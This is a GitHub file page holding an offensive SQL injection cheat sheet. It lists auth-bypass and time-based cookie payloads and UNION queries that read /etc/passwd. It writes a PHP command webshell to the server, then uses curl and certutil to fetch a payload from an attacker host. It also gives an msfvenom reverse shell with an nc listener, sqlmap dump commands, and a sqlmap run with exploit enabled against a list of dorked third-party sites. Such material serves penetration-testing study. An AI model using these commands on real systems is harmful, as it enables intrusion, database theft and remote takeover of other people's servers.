-
Notifications
You must be signed in to change notification settings - Fork 1
/
mxsqli
111 lines (84 loc) · 3.19 KB
/
mxsqli
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
===================================
SQL Injection
'
"
;
OR 1=1-- -
' OR 1=1-- -
" OR 1=1-- -
admin' --
' OR 1=1 --
" OR 1=1 --
' OR 1=1;#
" OR 1=1 #
',convert(int@@version))--
===================================
PHP SQLi Parameter "?"
View Page Source > Ctrl-F "?"
http://192.168.200.5/room.php?cod=1'
Error/no-graphic = We have injection
===================================
Burp
If Burp finds a SQL Injection possibility.
Send it to SQLMap!
===================================
Cookie + Timebased Injection
Cookie: TrackingId=x'||dbms_pipe.receive_message(('a'),10) ..oracle
Cookie: TrackingId=x'||WAITFOR DELAY '0:0:10' ..MSSQL
Cookie: TrackingId=x'||pg_sleep(10) ..Postgres
Cookie: TrackingId=x'||sleep(10) ..mysql
Sqlmap Cookie attack
Add a * when you want sqlmap to attack something specific
sqlmap -u 'https://site/' --cookie='TrackingId=8g3RMzFVP*;session=8KZ7YvSx'
===================================
PHP Webshell
' AND 1=2 UNION SELECT database(),user(),version() --
' AND 1=2 UNION SELECT database(),user() --
' AND 1=2 UNION SELECT database() --
' AND 1=2 UNION SELECT "/etc/passwd","b","c"--'
' UNION SELECT ("test") INTO OUTFILE 'C:/xampp/htdocs/test.php' -- -'
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php' -- -'
Webshell
curl "http://192.168.200.5:8080/cmd.php?cmd=whoami"
curl "http://192.168.200.5:8080/cmd.php?cmd=dir"
curl "http://192.168.200.5:8080/cmd.php?cmd=certutil -f -urlcache http://192.168.162.46:80/shell.exe
curl "http://192.168.200.5:8080/cmd.php?cmd=shell.exe"
Webshell to Reverse
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=53 -f exe -o reverse.exe
python3 -m http.server 80
nc -lvnp 53
===================================
Burp Request in Sqlmap
Burp > GET Request > R.Click > Copy to File 'burp.req'
sqlmap -r burp.req --batch --dbs
sqlmap -r burp.req --batch -D somedb --tables
sqlmap -r burp.req --batch -D somedb -T sometble --dump --threads 10
===================================
Burp Extensions
SQLiPy
https://github.com/PortSwigger/sqli-py
Install older jython = 2.7.2
Install SQLiPy from the BApp Store
Start the API
Target > Request > Extensions > Send to SQPiPy
Can do multiples.. manually.. click to start each
Result will show as a Finding under "Issues"
CO2 extension
Can help build Sqlmap statements
===================================
Auto-Answered
sqlmap -u 'http://site/product?id=1' -p 'id' --batch --random-agent
--level=5 --risk=3 --thread 5 --dbs --output-dir="/tmp/"
--answer="extending=N,follow=N,keep=N,exploit=Y"
- extending: increase level and risk.
- follow: follow redirection.
- keep: keep running or not if connection timeout.
- exploit: exploit or not if target exploitable.
===================================
Dork List
sqlmap -m dorks.txt --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --level=5 --risk=3 --dbs
cat dorks.txt
http://siteone/include/chart_generator.php?session=1
http://sitetwo/pandora_console/include/whatever?param=555
===================================
Consider: mxweb mxcurls